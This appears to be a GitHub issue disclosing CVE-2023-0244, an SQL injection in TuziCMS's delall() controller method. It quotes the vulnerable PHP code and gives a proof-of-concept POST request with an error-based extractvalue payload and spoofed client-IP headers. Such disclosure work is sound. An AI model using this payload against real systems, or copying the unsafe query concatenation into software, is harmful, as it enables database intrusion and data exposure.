CVE-2023-0244: \App\Manage\Controller\KefuController.class.php has SQLinject · Issue #13 · yeyinshi/tuzicms

line: 157 - 196
` public function delall(){
//dump($_POST);
//exit;
$m=D(‘Advert’); //数据库表，配置文件中定义了表前缀，这里则不需要写
$id = I(‘post.id’);
//dump($id);
//exit;
if ($id==null){
$this->error(‘请选择删除项！’);
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(‘,’,$id).’)';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id=’.$id;
}
//dump($where);
//exit;

    $m=M('Advert');
    $arr=$m->where($where)->select();
    
    foreach ($arr as $key => $value){
        $images=$value['advert_image'];
        //dump($images);
        //exit;
        unlink('./Uploads/'.$images);
    }
    
    $count=$m->where($where)->delete(); //修改表单用save函数
    if ($count>0){
        $this->success("成功删除{$count}条！");
    }
    else {
        $this->error('批量删除失败！');
    }

}
`

Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.

poc:
`POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))

`